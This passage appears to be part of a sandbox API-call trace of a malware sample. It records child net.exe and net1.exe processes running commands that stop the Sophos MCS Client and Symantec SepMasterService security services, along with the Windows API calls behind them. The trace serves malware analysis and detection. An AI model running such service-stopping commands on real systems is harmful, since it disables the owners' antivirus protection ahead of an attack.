cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0203.835] WriteFile (in: hFile=0x26c, lpBuffer=0x893f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdf9d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9d0, lpOverlapped=0x0) returned 0 [0203.836] LocalFree (hMem=0x893f90) returned 0x0 [0203.836] GetFileType (hFile=0x26c) returned 0x3 [0203.836] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x896238 [0203.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x896238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x89", lpUsedDefaultChar=0x0) returned 2 [0203.836] WriteFile (in: hFile=0x26c, lpBuffer=0x896238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf9d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9d0, lpOverlapped=0x0) returned 0 [0203.836] LocalFree (hMem=0x896238) returned 0x0 [0203.836] _ultow (in: _Dest=0x889, _Radix=915968 | out: _Dest=0x889) returned="2185" [0203.836] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x6ab338, nSize=0x800, Arguments=0x6a9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0203.836] GetFileType (hFile=0x26c) returned 0x3 [0203.836] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x896238 [0203.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x896238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0203.836] WriteFile (in: hFile=0x26c, lpBuffer=0x896238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdf9dc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9dc, lpOverlapped=0x0) returned 0 [0203.836] LocalFree (hMem=0x896238) returned 0x0 [0203.836] GetFileType (hFile=0x26c) returned 0x3 [0203.836] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x896238 [0203.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x896238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x89", lpUsedDefaultChar=0x0) returned 2 [0203.836] WriteFile (in: hFile=0x26c, lpBuffer=0x896238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf9dc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9dc, lpOverlapped=0x0) returned 0 [0203.836] LocalFree (hMem=0x896238) returned 0x0 [0203.837] NetApiBufferFree (Buffer=0x891c78) returned 0x0 [0203.837] NetApiBufferFree (Buffer=0x891c90) returned 0x0 [0203.837] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SepMasterService /y" [0203.837] exit (_Code=2) Process: id = "210" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x716d1000" os_pid = "0x7a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos MCS ClientΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 383 os_tid = 0x1e8 Process: id = "211" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x224b5000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0x7a8" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos MCS ClientΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 384 os_tid = 0xbe8 [0204.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32ff04 | out: lpSystemTimeAsFileTime=0x32ff04*(dwLowDateTime=0x42dd5200, dwHighDateTime=0x1d57a87)) [0204.140] GetCurrentProcessId () returned 0x69c [0204.140] GetCurrentThreadId () returned 0xbe8 [0204.140] GetTickCount () returned 0x116ca80 [0204.140] QueryPerformanceCounter (in: lpPerformanceCount=0x32fefc | out: lpPerformanceCount=0x32fefc*=32442433874) returned 1 [0204.140] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0204.140] __set_app_type (_Type=0x1) [0204.140] __p__fmode () returned 0x74eb31f4 [0204.140] __p__commode () returned 0x74eb31fc [0204.140] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40ffe6) returned 0x0 [0204.140] __getmainargs (in: _Argc=0x419064, _Argv=0x41906c, _Env=0x419068, _DoWildCard=0, _StartInfo=0x419024 | out: _Argc=0x419064, _Argv=0x41906c, _Env=0x419068) returned 0 [0204.140] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.140] GetConsoleOutputCP () returned 0x1b5 [0204.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x419080 | out: lpCPInfo=0x419080) returned 1 [0204.141] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.144] sprintf_s (in: _DstBuf=0x32febc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0204.144] setlocale (category=0, locale=".437") returned="English_United States.437" [0204.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0204.146] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0204.146] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos MCS ClientΓÇ¥ /y" [0204.147] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32fc88, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0204.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8a) returned 0x764bf8 [0204.147] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0204.147] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32fe8c | out: Buffer=0x32fe8c*=0x761c90) returned 0x0 [0204.147] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32fe8c | out: Buffer=0x32fe8c*=0x761ca8) returned 0x0 [0204.147] _fileno (_File=0x74eb2900) returned -2 [0204.147] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0204.147] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0204.147] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0204.147] _wcsicmp (_String1="config", _String2="stop") returned -16 [0204.147] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0204.147] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0204.147] _wcsicmp (_String1="file", _String2="stop") returned -13 [0204.147] _wcsicmp (_String1="files", _String2="stop") returned -13 [0204.147] _wcsicmp (_String1="group", _String2="stop") returned -12 [0204.147] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0204.147] _wcsicmp (_String1="help", _String2="stop") returned -11 [0204.147] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0204.148] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0204.148] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0204.148] _wcsicmp (_String1="session", _String2="stop") returned -15 [0204.148] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0204.148] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0204.148] _wcsicmp (_String1="share", _String2="stop") returned -12 [0204.148] _wcsicmp (_String1="start", _String2="stop") returned -14 [0204.148] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0204.148] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0204.148] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0204.148] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0204.148] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0204.148] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0204.148] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0204.148] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0204.148] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0204.148] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0204.148] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0204.148] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0204.148] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0204.148] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0204.148] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0204.148] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0204.148] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0204.148] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0204.148] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0204.148] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0204.148] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0204.149] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0204.149] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0204.149] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0204.149] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0204.149] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0204.149] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0204.149] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0204.149] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0204.149] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0204.149] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0204.149] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0204.149] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0204.149] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0204.149] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0204.149] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0204.149] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0204.149] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0204.149] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0204.149] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0204.149] _wcsicmp (_String1="accounts", _String2="MCS") returned -12 [0204.149] _wcsicmp (_String1="computer", _String2="MCS") returned -10 [0204.149] _wcsicmp (_String1="config", _String2="MCS") returned -10 [0204.149] _wcsicmp (_String1="continue", _String2="MCS") returned -10 [0204.149] _wcsicmp (_String1="cont", _String2="MCS") returned -10 [0204.149] _wcsicmp (_String1="file", _String2="MCS") returned -7 [0204.149] _wcsicmp (_String1="files", _String2="MCS") returned -7 [0204.149] _wcsicmp (_String1="group", _String2="MCS") returned -6 [0204.149] _wcsicmp (_String1="groups", _String2="MCS") returned -6 [0204.149] _wcsicmp (_String1="help", _String2="MCS") returned -5 [0204.149] _wcsicmp (_String1="helpmsg", _String2="MCS") returned -5 [0204.149] _wcsicmp (_String1="localgroup", _String2="MCS") returned -1 [0204.149] _wcsicmp (_String1="pause", _String2="MCS") returned 3 [0204.149] _wcsicmp (_String1="session", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="sessions", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="sess", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="share", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="start", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="stats", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="statistics", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="stop", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="time", _String2="MCS") returned 7 [0204.150] _wcsicmp (_String1="user", _String2="MCS") returned 8 [0204.150] _wcsicmp (_String1="users", _String2="MCS") returned 8 [0204.150] _wcsicmp (_String1="msg", _String2="MCS") returned 16 [0204.150] _wcsicmp (_String1="messenger", _String2="MCS") returned 2 [0204.150] _wcsicmp (_String1="receiver", _String2="MCS") returned 5 [0204.150] _wcsicmp (_String1="rcv", _String2="MCS") returned 5 [0204.150] _wcsicmp (_String1="netpopup", _String2="MCS") returned 1 [0204.150] _wcsicmp (_String1="redirector", _String2="MCS") returned 5 [0204.150] _wcsicmp (_String1="redir", _String2="MCS") returned 5 [0204.150] _wcsicmp (_String1="rdr", _String2="MCS") returned 5 [0204.150] _wcsicmp (_String1="workstation", _String2="MCS") returned 10 [0204.150] _wcsicmp (_String1="work", _String2="MCS") returned 10 [0204.150] _wcsicmp (_String1="wksta", _String2="MCS") returned 10 [0204.150] _wcsicmp (_String1="prdr", _String2="MCS") returned 3 [0204.150] _wcsicmp (_String1="devrdr", _String2="MCS") returned -9 [0204.150] _wcsicmp (_String1="lanmanworkstation", _String2="MCS") returned -1 [0204.150] _wcsicmp (_String1="server", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="svr", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="srv", _String2="MCS") returned 6 [0204.150] _wcsicmp (_String1="lanmanserver", _String2="MCS") returned -1 [0204.150] _wcsicmp (_String1="alerter", _String2="MCS") returned -12 [0204.150] _wcsicmp (_String1="netlogon", _String2="MCS") returned 1 [0204.150] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.150] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.151] wcscpy_s (in: _Destination=0x32f98c, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0204.151] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a00000 [0204.152] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x32f988, nSize=0x0, Arguments=0x32f984 | out: lpBuffer="变vneth.dll") returned 0xff [0204.153] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0204.153] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.153] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0204.153] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0204.153] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0204.153] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.153] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0204.153] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0204.153] _wcsicmp (_String1="CONT", _String2="MCS") returned -10 [0204.153] _wcsicmp (_String1="CONT", _String2="ClientΓÇ¥") returned 3 [0204.153] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.153] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0204.154] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0204.154] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.154] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0204.154] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0204.154] _wcsicmp (_String1="FILES", _String2="MCS") returned -7 [0204.154] _wcsicmp (_String1="FILES", _String2="ClientΓÇ¥") returned 3 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.154] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0204.154] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0204.154] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.154] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0204.154] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0204.154] _wcsicmp (_String1="GROUPS", _String2="MCS") returned -6 [0204.154] _wcsicmp (_String1="GROUPS", _String2="ClientΓÇ¥") returned 4 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.154] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0204.154] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0204.154] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.154] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0204.154] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0204.154] _wcsicmp (_String1="REPL", _String2="MCS") returned 5 [0204.154] _wcsicmp (_String1="REPL", _String2="ClientΓÇ¥") returned 15 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0204.154] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.154] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0204.154] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0204.154] _wcsicmp (_String1="REPLICATOR", _String2="MCS") returned 5 [0204.154] _wcsicmp (_String1="REPLICATOR", _String2="ClientΓÇ¥") returned 15 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.154] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0204.154] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.154] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0204.154] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.155] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0204.155] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0204.155] _wcsicmp (_String1="SESSIONS", _String2="MCS") returned 6 [0204.155] _wcsicmp (_String1="SESSIONS", _String2="ClientΓÇ¥") returned 16 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0204.155] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.155] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0204.155] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0204.155] _wcsicmp (_String1="SESS", _String2="MCS") returned 6 [0204.155] _wcsicmp (_String1="SESS", _String2="ClientΓÇ¥") returned 16 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.155] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0204.155] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0204.155] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.155] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0204.155] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0204.155] _wcsicmp (_String1="STATS", _String2="MCS") returned 6 [0204.155] _wcsicmp (_String1="STATS", _String2="ClientΓÇ¥") returned 16 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.155] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0204.155] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0204.155] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.155] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0204.155] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0204.155] _wcsicmp (_String1="USERS", _String2="MCS") returned 8 [0204.155] _wcsicmp (_String1="USERS", _String2="ClientΓÇ¥") returned 18 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.155] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0204.155] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.155] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0204.155] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.155] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0204.155] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0204.155] _wcsicmp (_String1="REDIRECTOR", _String2="MCS") returned 5 [0204.155] _wcsicmp (_String1="REDIRECTOR", _String2="ClientΓÇ¥") returned 15 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0204.156] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.156] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0204.156] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0204.156] _wcsicmp (_String1="REDIR", _String2="MCS") returned 5 [0204.156] _wcsicmp (_String1="REDIR", _String2="ClientΓÇ¥") returned 15 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0204.156] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.156] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0204.156] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0204.156] _wcsicmp (_String1="RDR", _String2="MCS") returned 5 [0204.156] _wcsicmp (_String1="RDR", _String2="ClientΓÇ¥") returned 15 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0204.156] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.156] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0204.156] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0204.156] _wcsicmp (_String1="WORK", _String2="MCS") returned 10 [0204.156] _wcsicmp (_String1="WORK", _String2="ClientΓÇ¥") returned 20 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0204.156] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.156] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0204.156] _wcsicmp 